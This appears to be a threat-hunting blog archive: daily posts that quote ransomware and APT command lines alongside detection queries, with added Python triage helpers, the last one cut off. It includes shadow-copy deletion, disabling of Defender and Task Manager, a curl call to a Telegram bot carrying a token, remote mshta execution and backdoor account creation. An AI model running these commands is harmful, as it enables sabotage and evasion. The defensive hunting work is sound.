Posts

Showing posts from December, 2025

365. The Zeltser Challenge Completed

Hello everyone! No, no more detection and hunting tips today! And yes, it's the last post of the Zeltser challenge! It was definitely a hard one, but still it was fun! Thank you, Dave, for motivating me to start it! Thanks to everyone who reacted to the posts and wrote kind words; it helped me a lot to finish it! It doesn't mean I'll stop posting! But I won't do it every day! Still, if I see something interesting, I'll share it with you! Thank you for reading the blog, and see you next year!

364. Another RMM in a Ransomware Affiliate's Toolkit

Hello everyone! Today we'll look at another example of a very common technique, Remote Access Tools: Remote Desktop Software (T1219.002). Ransomware gangs keep plenty of such tools in their arsenal. Today's example is Power Admin's PA Server Monitor, a legitimate tool that monitors servers and applications and also provides file access auditing. If it is not part of your approved toolset, it is a good target for detection and hunting, for example:
event_type: "processcreatewin" AND proc_file_productname: "pa server monitor"
See you tomorrow!

363. That's How Arcane Werewolf Abuses Conhost

Hello everyone! We often talk about (and, of course, see) LOLBAS. So let's look at another one that became really popular among adversaries this year. Today's example is Arcane Werewolf. The adversary leverages conhost.exe to run the dropper:
conhost.exe C:\Users\<USER>\AppData\Local\Temp\icon2.png
One more example, running the Loki 2.0 loader:
conhost.exe %TEMP%\chrome_proxy.pdf
As you can see, the threat actors give their payloads quite suspicious file extensions (conhost.exe launches whatever path it is given as a child process, regardless of the extension), so we can use that to build a query:
event_type: "processcreatewin" AND proc_file_path: "conhost.exe" AND cmdline: (*png OR *pdf)
See you tomorrow!

362. Ransomware Gangs Use This Tool for Discovery

Hello everyone! Today we'll talk about how ransomware gangs abuse legitimate software for File and Directory Discovery (T1083). Our example for today's post is NightSpire. Among other tools, the gang leveraged Everything, a legitimate file search tool that indexes the file system and gives the adversary a quick, complete picture of the data available on the compromised system. So this tool, especially if it's not widely used internally, may be a good target for hunting:
event_type: "processcreatewin" AND proc_file_originalfilename: "everything.exe"
Since the query keys on the original file name from the version resource, it still matches if the binary is renamed on disk. See you tomorrow!

361. That's How Adversaries Manipulate Volume Shadow Copy Service

Hello everyone! It's not a secret that ransomware gangs often interact with the Volume Shadow Copy Service to Inhibit System Recovery (T1490). In most cases it's not a good target for hunting, as adversaries abuse it in the latest stages of the attack lifecycle. At the same time, they may use scripting to manipulate it, and it may be your last chance to detect malicious activity. For example, Qilin executed the following commands:
cmd /C net start vss
cmd /C wmic service where name='vss' call ChangeStartMode Manual
cmd /C vssadmin.exe Delete Shadows /all /quiet
cmd /C net stop vss
cmd /C wmic service where name='vss' call ChangeStartMode Disabled
I'm sure you have detections for deletion, but what about manipulating the service? So it may be a good idea to look for abuse of wmic.exe for VSS manipulation:
event_type: "processcreatewin" AND proc_file_path: "wmic.exe" AND cmdline: "vss"
WMIC is deprecated and is no longer installed by default on the newest Windows 11 builds, so on such hosts any wmic.exe execution is notable in itself. See you tomorrow!

360. That's How Valley RAT Modifies Registry to Store Plugins

Hello everyone! Adversaries may use the Windows registry to solve various tasks. Some are very common, while others are not. Let's look at one of the latter! Today we'll look at Valley RAT. According to this report, it uses the following registry key to store downloaded plugins:
HKCU\Console\0\d33f351a4aeea5e608853d1a56661059
HKCU\Console is where the console host keeps per-window settings, so binary blobs written under it are worth a look. From a threat hunting perspective, we can look for suspicious registry modification events related to HKCU\Console\:
event_type: "registryvaluesetwin" AND reg_key_path: "hkey_current_user\\console"
See you tomorrow!

359. Hunting for Suspicious File Deletion Events

Hello everyone! As you know, adversaries may delete malicious files and tools for defense evasion. But can we use that for threat hunting? Let's find out! We need an example, of course. Let's look at the Amadey loader described in this report. The adversary leveraged a chain of commands to kill the running sample, delete the existing malicious file, rename a staged copy to the same name and run it:
cmd.exe /k "taskkill /f /im "Yfgfwb.exe" && timeout 1 && del "Yfgfwb.exe" && ren 07072f Yfgfwb.exe && C:\Users\UserName\Appdata\Local\Temp\067640a009\Yfgfwb.exe && Exit"
For example, we can look for sequences of suspicious commands, like taskkill and del, in one command line:
event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("taskkill" AND "del")
See you tomorrow!
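As an added example (my code, not code from the original post or the report it cites), here is the same hunt expressed over the command line itself rather than as two keyword hits: split the cmd.exe chain on && and require that taskkill, del and ren all act on one image name that is then executed. The cmd /k or /c wrapper handling, the assumption that file names contain no spaces, and the benign command line used for comparison are mine.

```python
"""Added example, not from the original post: parse a cmd.exe '&&' chain and
flag the kill -> delete -> rename -> execute self-replacement pattern seen in
the Amadey command line above. Parsing assumptions (a cmd /k or /c wrapper,
file names without spaces) are mine."""
import re
from typing import Dict, List, Optional

# Command line quoted in the post (path and names exactly as printed there).
AMADEY_CMDLINE = (
    'cmd.exe /k "taskkill /f /im "Yfgfwb.exe" && timeout 1 && del "Yfgfwb.exe" '
    '&& ren 07072f Yfgfwb.exe '
    '&& C:\\Users\\UserName\\Appdata\\Local\\Temp\\067640a009\\Yfgfwb.exe && Exit"'
)

# cmd[.exe] /k|/c "<chain>"  -> capture the chain without the outer quotes
_WRAPPER = re.compile(r'^\s*"?[^"\s]*cmd(?:\.exe)?"?\s+/[kc]\s+"?(.*?)"?\s*$', re.I)


def split_cmd_chain(cmdline: str) -> List[str]:
    """Return the commands chained with '&&', with the cmd /k|/c "..." wrapper removed."""
    m = _WRAPPER.match(cmdline)
    body = m.group(1) if m else cmdline
    return [step.strip() for step in body.split("&&") if step.strip()]


def _base(token: str) -> str:
    """Lower-cased file name without quotes or directory (yfgfwb.exe, not the path)."""
    return token.strip('"').lower().rsplit("\\", 1)[-1]


def find_self_replacement(cmdline: str) -> Optional[Dict[str, str]]:
    """Match taskkill /im X, del X, ren * X and a final execution of X in one chain.

    The post's query (cmdline contains "taskkill" and "del") also fires on
    maintenance scripts that kill one process and delete an unrelated log;
    tying every step to the same image name is what makes this pattern specific.
    """
    killed = deleted = renamed_to = None
    for step in split_cmd_chain(cmdline):
        verb, *args = step.split()
        v = verb.lower()
        if v == "taskkill":
            for i, a in enumerate(args):
                if a.lower() == "/im" and i + 1 < len(args):
                    killed = _base(args[i + 1])
        elif v == "del" and args:
            deleted = _base(args[-1])        # last argument; switches like /f /q come first
        elif v == "ren" and len(args) >= 2:
            renamed_to = _base(args[-1])     # ren OLD NEW
        elif killed and killed == deleted == renamed_to and _base(verb) == killed:
            return {"image": killed, "executed_from": verb.strip('"')}
    return None


if __name__ == "__main__":
    for step in split_cmd_chain(AMADEY_CMDLINE):
        print("step:", step)
    print(find_self_replacement(AMADEY_CMDLINE))
```

Running it prints the six steps of the chain and a hit for yfgfwb.exe; a constructed benign line such as cmd.exe /c "taskkill /f /im notepad.exe && del C:\Temp\old.log" contains both keywords but returns None because the names differ.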

358. Adversaries Abuse GoToHTTP for Redundant Access

Hello everyone! It's time to look at another interesting RMM abused by threat actors for redundant access, and to check whether your detections cover it. According to this report, the adversary dropped a renamed copy of GoToHTTP on the compromised system. Interestingly, the threat actors only need to install this RMM on the system they want to control, and to operate it they need nothing but a web browser! So you can look for related network connections:
event_type: "dnsreqwin" AND dns_rname: "gotohttp.com"
And for the binary itself, of course. Because the copy was renamed, key on the product name from the version resource rather than on the file name:
event_type: "processcreatewin" AND proc_file_productname: "gotohttp"
See you tomorrow!

357. That's Why I'm Talking About It That Often!

Hello everyone! Today we'll look at an example provided by our colleagues from Zscaler in their recent research. And yes, it's legitimate service abuse one more time! According to the research, Zscaler Threat Hunting observed a localized spike in traffic to the URL shortener surl[.]li. The adversary (SideWinder) used this service to redirect the victim to a phishing page with a link to gofile[.]io, which hosted ZIP archives with a bunch of files, including malicious ones. So here we have a real-world example of how defenders leveraged their knowledge of legitimate web services abused by adversaries to form a hypothesis and find undetected malicious activity. You can do the same:
event_type: "dnsreqwin" AND dns_rname: ("surl.li" OR "gofile.io")
See you tomorrow!

356. Adversaries Abuse Archive.org to Store Malicious PNG Files

Hello everyone! You may be a bit tired of the various legitimate web services abused by adversaries, but such services are always good targets for hunting, so let's look at another example. This time adversaries leveraged Archive[.]org to store malicious PNG files, for example:
hxxp://dn710107.ca.archive[.]org/0/items/msi-pro-with-b-64_20251208_1511/MSI_PRO_with_b64[.]png
Such files carried a base64-encoded .NET assembly appended after the image data, so the file still renders as a picture, and the adversary used PowerShell to download and execute it. Knowing all of this, we can build a hunting query:
event_type: "dnsreqwin" AND dns_rname: "archive.org" AND proc_file_path: "powershell.exe"
See you tomorrow!
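As an added example (my code, not from the original post or the research it refers to), here is a first-pass triage check for the file side of this hunt: walk the PNG chunk list, take whatever follows the IEND chunk, and see whether it base64-decodes to something starting with MZ. The 1x1 PNG and the fake MZ payload are constructed in the block; real samples may wrap the blob in markers, so a miss here does not clear a file.

```python
"""Added example, not from the original post: locate data appended after a
PNG's IEND chunk and check whether it base64-decodes to a PE ('MZ') image,
the way the Archive.org-hosted PNGs above carried a .NET assembly. The tiny
PNG and the fake 'MZ' payload are constructed here; real samples may wrap
the blob in markers, so treat this as a first-pass triage check."""
import base64
import struct
import zlib
from typing import Optional

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
FAKE_PE = b"MZ" + b"\x00" * 62 + b"PE\x00\x00"   # constructed stand-in, not a real executable


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """One PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A valid 1x1 8-bit greyscale PNG (constructed test input)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x80")            # filter byte 0 + one grey pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def tainted_png() -> bytes:
    """The same image with a base64 payload appended after IEND, as in the post."""
    return minimal_png() + b"\r\n" + base64.b64encode(FAKE_PE)


def trailing_data(png: bytes) -> bytes:
    """Walk the chunk list and return whatever follows IEND (b'' for a clean file)."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        pos += 12 + length                       # 4 length + 4 type + data + 4 crc
        if ctype == b"IEND":
            return png[pos:]
    raise ValueError("truncated PNG: no IEND chunk")


def hidden_pe(png: bytes) -> Optional[bytes]:
    """Return the decoded trailer if it is base64 of something starting with 'MZ'."""
    tail = b"".join(trailing_data(png).split())   # drop CR/LF/space wrapping
    if not tail:
        return None
    try:
        blob = base64.b64decode(tail, validate=True)
    except ValueError:                            # binascii.Error is a ValueError
        return None
    return blob if blob.startswith(b"MZ") else None


if __name__ == "__main__":
    print("clean  :", hidden_pe(minimal_png()))
    print("tainted:", hidden_pe(tainted_png())[:2])
```

Image viewers stop at IEND, which is why the appended assembly does not break the picture; the same walk also catches trailers that are not base64 at all, because trailing_data returns them for a manual look.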

355. Hunting for ESXCLI Abuse

Hello everyone! If we're talking about ransomware gangs, we're always talking about Command and Scripting Interpreter: Hypervisor CLI (T1059.012). Yes, ransomware gangs love it! Let's look at RansomHouse, and focus on MrAgent. To obtain the MAC address, it runs the following command:
esxcli --formatter=csv network nic list
It queries the esxcli network ip namespace in the same CSV format to collect the host's IP address, and it also abuses ESXCLI to disable the firewall:
esxcli network firewall set --enabled false
So, for example, we can hunt for suspicious commands related to managing host networking:
event_type: "processcreatenix" AND cmdline: ("esxcli" AND "network")
Legitimate administration also touches this namespace, so baseline who runs esxcli on your hosts and from where. See you tomorrow!

354. Adversaries Modify Registry to Make the Console Window Appear Off-Screen

Hello everyone! We often see how adversaries make console windows hidden. But they can also just make them appear off-screen! Let's look at an example! This time we'll look at Cloud Atlas (or Cloud Werewolf, as we track it). The adversary modified the following registry values to push console windows off the visible desktop:
"HKCU\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe"::"WindowPosition"::5122
"HKCU\Console\taskeng.exe"::"WindowPosition"::538126692
The console host keeps per-executable settings under HKCU\Console\<path with backslashes replaced by underscores>, and WindowPosition packs the X coordinate into the low 16 bits and Y into the high 16 bits, so 5122 (0x1402) is X=5122, Y=0 and 538126692 (0x20132964) is X=10596, Y=8211: well outside any normal desktop. Quite interesting, right? And we can look for suspicious registry modification events:
event_type: "registryvaluesetwin" AND reg_key_path: "windowposition"
See you tomorrow!
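As an added example (my code, not from the original post or the Cloud Atlas report), here is the decoding step that turns the raw WindowPosition DWORD into coordinates, plus a filter over registry value-set events that keeps only off-screen positions. Reading each half as a signed 16-bit value (negative means a monitor left of or above the primary), the 1920x1080 desktop size and the event field names are my assumptions; the two values are the ones from the post.

```python
"""Added example, not from the original post: decode the Console\\...\\WindowPosition
DWORD and flag values that put a console window outside the desktop. The
console host stores X in the low 16 bits and Y in the high 16 bits; treating
each half as signed (negative = a monitor left of or above the primary) and
the 1920x1080 desktop size are my assumptions. Event records are constructed."""
from typing import Dict, List, Tuple


def decode_window_position(value: int) -> Tuple[int, int]:
    """Return (x, y) from the packed DWORD, each half read as a signed 16-bit int."""
    def s16(n: int) -> int:
        n &= 0xFFFF
        return n - 0x10000 if n & 0x8000 else n
    return s16(value & 0xFFFF), s16(value >> 16)


def is_off_screen(value: int, width: int = 1920, height: int = 1080) -> bool:
    """True when the window's top-left corner lies outside [0,width) x [0,height)."""
    x, y = decode_window_position(value)
    return not (0 <= x < width and 0 <= y < height)


def hunt_window_position(events: List[Dict[str, object]],
                         width: int = 1920, height: int = 1080) -> List[Dict[str, object]]:
    """Keep registry value-set events under HKCU\\Console that set an off-screen WindowPosition."""
    hits = []
    for ev in events:
        key = str(ev["reg_key_path"]).lower()
        if not key.startswith("hkcu\\console\\"):
            continue
        if str(ev["reg_value_name"]).lower() != "windowposition":
            continue
        if is_off_screen(int(ev["reg_value_data"]), width, height):
            hits.append(ev)
    return hits


# Constructed events: the two values from the post plus one benign drag to (30, 20).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"reg_key_path": r"HKCU\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe",
     "reg_value_name": "WindowPosition", "reg_value_data": 5122},
    {"reg_key_path": r"HKCU\Console\taskeng.exe",
     "reg_value_name": "WindowPosition", "reg_value_data": 538126692},
    {"reg_key_path": r"HKCU\Console\%SystemRoot%_System32_cmd.exe",
     "reg_value_name": "WindowPosition", "reg_value_data": (20 << 16) | 30},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["reg_key_path"], decode_window_position(int(ev["reg_value_data"])))
    print(len(hunt_window_position(SAMPLE_EVENTS)), "suspicious")
```

Users with several monitors legitimately write positions beyond the primary display, so pass the full virtual desktop bounds rather than one screen; values in the thousands, as in the post, exceed any real layout.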

353. Adversaries Abuse Fastly for C2 Infrastructure

Hello everyone! Let's look at another interesting example of how adversaries abuse legitimate infrastructure for C2. This time it's Fastly. Kaspersky revealed another ForumTroll campaign. This time the adversary leveraged Tuoni, a commercial red teaming framework. At the same time, the threat actors used the same service for C2 as in previous campaigns: Fastly. What does it mean? We can use it for our threat hunting missions!
event_type: "dnsreqwin" AND dns_rname: "fastly.net"
Fastly is a major CDN, so this query will be noisy; filter out the browsers and updaters that legitimately talk to it and look at the remaining processes and hostnames. See you tomorrow!

352. That's How Ink Dragon Downgrades Security Controls

Hello everyone! Today we'll look at a few more examples of how adversaries intentionally weaken the Windows security posture to assist persistence and lateral movement. According to the report, Ink Dragon modified various Windows registry settings to downgrade security controls: enabled Restricted Admin mode (DisableRestrictedAdmin set to 0, which makes pass-the-hash work over RDP), disabled remote UAC token filtering (LocalAccountTokenFilterPolicy set to 1, so local administrators get a full token over the network), enabled the DSRM (Directory Services Restore Mode) Administrator account for regular logons (DsrmAdminLogonBehavior), and removed the LSA Process Protection Level safeguard (RunAsPPL). These behaviors are definitely good targets for hunting, for example:
event_type: "registryvaluesetwin" AND reg_key_path: "localaccounttokenfilterpolicy" AND reg_value_data: "0x00000001"
See you tomorrow!

351. Adversaries Abuse Telegram for Payload Execution Notification

Hello everyone! Let's look at another curious case of how adversaries abuse legitimate web services to solve various tasks. This time we'll look at how they use Telegram for payload execution notification. Our example for today is DeerStealer. As you can see, the threat actors leveraged curl.exe to get a notification that the payload has been executed:
C:\WINDOWS\system32\cmd.exe /d /s /c "curl -s -X POST https://api.telegram.org/bot7972762095:AAE_DZEcCA4tkMpVK-peSGL6x4j4GMgl-3g/sendMessage -d chat_id=8093548175 -d text="undefined - executable запущен""
(The Russian word "запущен" means "launched".) Similar activity may be legitimate, as administrators may use Telegram to get notifications if anything goes wrong, but it's still a good target for threat hunting:
event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: *telegram*
The bot token and chat_id in the command line identify the operator's bot and recipient, so record them as indicators. See you tomorrow!

350. Threat Actors Leveraged the Discord API as Their C2 Channel

Hello everyone! In some cases adversaries do not need dedicated C2 infrastructure. They can use the following technique: Web Service (T1102). UNC5174, for example, leveraged the Discord API as their C2 channel. This approach enabled the adversary to mimic legitimate traffic patterns and evade existing security policies. Unfortunately, Discord-related domains may be resolved by various legitimate software, but it's still a great target for hunting, as it's not the first time threat actors abuse it:
event_type: ("dnsreqwin" OR "dnsreqnix") AND dns_rname: ("discord.com" OR "discord.gg") AND NOT proc_file_path: *discord*
Note that the NOT clause drops any process whose path contains "discord", so a payload named discord_update.exe would be excluded too; pair the exclusion with signer or hash checks before trusting it. See you tomorrow!

349. Adversaries Masquerade Legitimate Executables as Documents to Enable DLL Side-Loading

Hello everyone! DLL side-loading is becoming more and more popular among threat actors who distribute commodity malware, so today we'll look at Hijack Execution Flow: DLL (T1574.001). The adversary leveraged a renamed version of FoxitPDFReader.exe to load a malicious msimg32.dll, which starts a chain leading to a PureRAT payload. The threat actors used various names for the legitimate executable, for example:
Authentic_Job_Application_Form.exe
Project_Salary_Commission_and Benefits.exe
Compensation, Incentives, and Benefits for project participation.exe
Compensation_Benefits_Commission.exe
Digital_Marketing_Proficiency_Test.exe
Salary, Incentives, and Benefits for the Project.exe
Marketing_Performance_Test_Assignment.exe
Commission_Structure.exe
Salary_Incentives_and_Benefits_for_the_Project.exe
Pay_Benefits_Commission_Plan.exe
So one hunting opportunity for such activity is to look for FoxitPDFReader.exe running under uncommon names, that is, a process whose original file name (from the version resource) is FoxitPDFReader.exe but whose on-disk name differs:
event_type: "processcreatew...

348. Adversaries Hide Malicious Scripts Inside Subtitle Files

Hello everyone! Adversaries may hide malicious content anywhere, including in absolutely legitimate files, so today we'll look at the following technique: Obfuscated Files or Information: Steganography (T1027.003). In some cases threat actors use quite common malware but still employ some interesting techniques. Just like in this case. The adversary leveraged malicious LNK files to run a command that extracts and executes a malicious script from a subtitle file:
cmd.exe /c type Part2.subtitles.srt | more | findstr /n "^" | findstr "100: 101: 102: 103:" | for /f "tokens=1,* delims=:" %a in ('more') do cmd /c %b
What it does: findstr /n "^" prefixes every line of the subtitle file with its line number, the second findstr keeps the lines containing 100:, 101:, 102: or 103: (that is, lines 100 to 103), and the for /f loop splits each of them at the first colon and passes the remainder (%b) to cmd /c. Interesting, right? We can hunt for similar activity:
event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("type" AND "findstr" AND *.srt)
See you tomorrow!
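As an added example (my code, not from the original post or the case it describes), here is the extraction half of that pipeline reimplemented so an analyst can recover the hidden script from a subtitle file without executing it. The subtitle text and the four harmless stand-in payload lines are constructed in the block; the real script is not in the post.

```python
"""Added example, not from the original post: reproduce what the LNK's cmd.exe
pipeline does, without running anything, so the hidden script can be pulled
out of a subtitle file for analysis. findstr /n "^" numbers every line as N:text;
findstr "100: 101: 102: 103:" keeps lines containing ANY of those substrings;
for /f "tokens=1,* delims=:" splits at the first colon and hands the rest (%b)
to cmd /c. The subtitle text and the payload lines are constructed here."""
from typing import List, Sequence


def extract_hidden_lines(text: str,
                         markers: Sequence[str] = ("100:", "101:", "102:", "103:")) -> List[str]:
    """Return the command strings the pipeline would execute, in order."""
    numbered = [f"{i}:{line}" for i, line in enumerate(text.splitlines(), start=1)]
    # findstr with several space-separated terms is an OR of substring matches,
    # so "100:" would also hit a line 1100; the attacker relies on short files.
    kept = [line for line in numbered if any(m in line for m in markers)]
    commands = []
    for line in kept:
        _num, _sep, rest = line.partition(":")   # tokens=1 -> %a, * -> %b (later colons kept)
        rest = rest.lstrip(":")                  # for /f collapses consecutive delimiters
        if rest:                                 # an empty %b runs nothing
            commands.append(rest)
    return commands


def constructed_subtitle(payload: Sequence[str]) -> str:
    """Build an .srt-looking file: benign cues, the payload at lines 100-103, more cues after."""
    lines: List[str] = []
    n = 1
    while len(lines) < 99:
        lines += [str(n), f"00:00:{n:02d},000 --> 00:00:{n:02d},500", f"cue {n}", ""]
        n += 1
    lines = lines[:99]
    lines += list(payload)
    lines += ["", str(n), f"00:01:{n:02d},000 --> 00:01:{n:02d},500", "cue after payload"]
    return "\n".join(lines)


# Harmless stand-ins for the real stages (the actual script is not in the post).
PAYLOAD = ["echo stage1", "echo stage2 & echo ok",
           "rem stage3 has a colon: still one %b", "echo stage4"]

if __name__ == "__main__":
    for cmd in extract_hidden_lines(constructed_subtitle(PAYLOAD)):
        print("would run:", cmd)
```

The third payload line shows why tokens=1,* matters to the attacker: everything after the first colon, including later colons, reaches cmd /c intact, so PowerShell one-liners and URLs survive the split.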

347. Adversaries Modify Registry to Inhibit System Recovery and Analysis

Hello everyone! We have talked about Modify Registry (T1112) a few times already, but I spotted a few more interesting procedures, so let's have a look. Our example for today is VolkLocker. It has a few interesting behaviors related to registry modification. It disables Task Manager:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
It disables Registry Editor:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
It disables the Windows Command Shell:
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windo...

346. Hunting for Suspicious User Accounts

Hello everyone! Adversaries often use compromised credentials, but in some cases they create new accounts. And in some cases those accounts are quite distinctive, so we can use them for detection and hunting. As always, we need some examples. Let's look into this report. The adversary created new administrator accounts with the following names: backupadmin, admin_gpo and lapsadmin1. For example:
cmd.exe /c net user backupadmin abcd1234
Suspicious user creation events may be great targets for hunting, so make sure you document them not only for attribution and clustering, but also for detection:
event_type: "usercreatewin" AND usr_tgt_name: ("backupadmin" OR "admin_gpo" OR "lapsadmin1")
Names like these are chosen to blend in with real admin accounts, so also review any new local administrator created outside your provisioning process. See you tomorrow!

345. That's How Adversaries Remove Indicators from Compromised Systems

Hello everyone! In many cases adversaries remove artifacts from compromised systems, so today we'll look at a few examples of Indicator Removal: File Deletion (T1070.004). Our example for today is 01flip ransomware. It has both Windows and Linux variants. The Windows variant removes itself using the following command:
ping 127.0.0.7 -n 5 > Nul & fsutil file setZeroData offset=0 length=4194303 ${self_name} > Nul & Del /f /q ${self_name}
As you can see, it abuses fsutil to zero out the file before deleting it (the ping is just a delay). We can look for similar activity:
event_type: "processcreatewin" AND proc_file_path: "fsutil.exe" AND cmdline: ("file" AND "setzerodata")
The Linux variant runs the following command:
sleep 5 && dd if=/dev/urandom of=${self_name} bs=1M count=4 > /dev/null 2>&1 && rm ${self_name} > /dev/null 2>&1
Here the adversary abuses dd to overwrite the file with random data, and it's another hunting opportunity:
event_type: "processcreatenix" AND p...

344. Adversaries Added Another Forensic Tool to Their Arsenal

Hello everyone! We have talked about this a few times already, but today I spotted another forensic tool in an adversary's arsenal. And yes, it's another example of how threat actors can obtain an LSASS dump. This time, according to this post, they used MemProcFS to mount a memory dump of the compromised system and pull LSASS out of it:
memprocfs.exe -device dump.dmp
Unless you are doing incident response, MemProcFS execution is quite a suspicious event, so it's worth a query:
event_type: "processcreatewin" AND proc_file_originalfilename: "memprocfs.exe"
See you tomorrow!

343. Ransomware Gangs Abuse SystemSettingsAdminFlows to Evade Defenses

Hello everyone! Today we'll look at another example of how adversaries abuse legitimate Windows executables to evade defenses. This time it's SystemSettingsAdminFlows.exe. According to this report, DeadLock leveraged this utility to disable various features of Windows Defender:
SystemSettingsAdminFlows.exe Defender RTP 1
SystemSettingsAdminFlows.exe Defender SpynetReporting 0
SystemSettingsAdminFlows.exe Defender SubmitSamplesConsent 0
SystemSettingsAdminFlows.exe Defender DisableEnhancedNotifications 1
These commands disable real-time protection (RTP) and cloud-delivered protection, stop the machine from sending threat reports to Microsoft, and prevent Windows Defender from automatically submitting suspicious files for analysis. Worth a query, isn't it?
event_type: "processcreatewin" AND proc_file_path: "systemsettingsadminflows.exe" AND cmdline: "defender"
See you tomorrow!

342. Mshta - A Great Target for Hunting

Hello everyone! It's Monday, so let's look at a classic (at least in my opinion) target for threat hunting: System Binary Proxy Execution: Mshta (T1218.005). I've spotted it again while looking through the report on the activity cluster we track as Lone Wolf. The adversary leveraged malicious LNK files to deploy a Cobalt Strike beacon. The LNK, for example, runs the following command:
powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'hxxps://iplogger[.]cn/forensicsas.png'"
As you can see, here mshta.exe is used to access a link that redirects to a malicious HTA file; the .png extension is irrelevant, since mshta executes whatever content it retrieves. So, for example, we can search for mshta.exe accessing suspicious links:
event_type: "processcreatewin" AND proc_file_path: "mshta.exe" AND cmdline: *http*
See you tomorrow!

341. Adversaries Abuse NSSM for Service Execution

Hello everyone! We have already looked at lots of legitimate tools that adversaries use to solve various tasks. It's time for another one! It's commonly used for System Services: Service Execution (T1569.002). I'm talking about the Non-Sucking Service Manager (NSSM). It's used by various threat actors. For example, if we look into the report on Red Wolf, we can see that it was used to create two distinct Windows service entries pointing to the same Chisel binary (MSAProfileNotificationHandler.exe). And yes, it's another great target for hunting:
event_type: "processcreatewin" AND proc_file_productname: "nssm"
Keep in mind that a service installed through NSSM has nssm.exe as its ImagePath, with the real binary recorded only under the service's Parameters key, so service creation events alone will show NSSM rather than Chisel. See you tomorrow!

340. Adversaries Modify the Registry to Disable Two Core Windows Security Mechanisms

Hello everyone! I've shared some notable examples of Modify Registry (T1112) already. It's time for a few more interesting ones. Sophos has published a great report on Red Wolf's recent activities. According to the report, the adversary modified the following registry values:
HKLM\SYSTEM\CurrentControlSet\Control\CI\Config /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 0x0 /f
HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity /v Enabled /t REG_DWORD /d 0x0 /f
The first one disables the Microsoft vulnerable driver blocklist, the second disables Hypervisor-Enforced Code Integrity; together they clear the way for a bring-your-own-vulnerable-driver (BYOVD) attack. Both are good targets for hunting, so:
event_type: "registryvaluesetwin" AND reg_key_path: ("VulnerableDriverBlocklistEnable" OR "HypervisorEnforcedCodeIntegrity") AND reg_value_data: "0x00000000"
The HVCI change only takes effect after a reboot, so a restart shortly after this event is part of the picture. See you tomorrow!

339. Hunting for MuddyWater's UDPGangster

Hello everyone! In some cases adversaries still use malicious documents to deliver malware. Let's look at a recent example. It's MuddyWater again. The adversary leveraged phishing emails to deliver malicious Microsoft Word documents. The document dropped UDPGangster to C:\Users\Public\ui.txt and executed it. Here we have winword.exe spawning a suspicious file from the %PUBLIC% folder. Let's transform that into a query:
event_type: "processcreatewin" AND proc_p_file_path: "winword.exe" AND proc_file_path: "public"
See you tomorrow!

338. Adversaries Change Windows Startup Folder Settings for Persistence

Hello everyone! If you're tired of common persistence mechanisms (just like me), this one is for you. Not a new one, but I don't see it very often. So, according to the report, the adversary leveraged MuddyViper. The malware configures its installation directory as the Windows Startup folder by setting the following registry values to %APPDATALOCAL%\Microsoft\Windows\PPBCompatCache\ManagerCache:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup
Explorer then launches whatever is in that directory at logon, while the real Startup folder is never touched. Worth building a hunt, right?
event_type: "registryvaluesetwin" AND reg_key_path: "shell folders\\startup" AND NOT reg_value_data: "programs\\startup"
The exclusion only checks for the programs\startup suffix, so if your data allows it, compare the full value with the per-user default path instead. See you tomorrow!
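As an added example (my code, not from the original post or the MuddyViper report), here is that hunt evaluated against the per-user default location rather than by suffix. A value of C:\Evil\Programs\Startup contains programs\startup and would slip past a NOT exclusion, but it does not resolve to the user's real Startup folder. The field names, the fake environment, the events and the use of the real %LOCALAPPDATA% variable for the MuddyViper path are my constructions.

```python
"""Added example, not from the original post: check registry value-set events
for the Explorer Startup folder entries against the per-user default location
instead of excluding a suffix. The query above drops any value containing
programs\\startup, so a redirect to C:\\Evil\\Programs\\Startup would pass;
expanding the value and comparing the full path does not have that gap.
Field names (reg_key_path, reg_value_name, reg_value_data), the fake
environment and the events are my constructions."""
import ntpath
import re
from typing import Dict, List

STARTUP_KEYS = (
    r"software\microsoft\windows\currentversion\explorer\user shell folders",
    r"software\microsoft\windows\currentversion\explorer\shell folders",
)
DEFAULT_STARTUP = r"AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"


def expand_env(value: str, env: Dict[str, str]) -> str:
    """Expand %VAR% references from a supplied environment (not the live one)."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), value)


def suffix_check(value: str) -> bool:
    """The post's logic: suspicious unless the data contains programs\\startup."""
    return r"programs\startup" not in value.lower()


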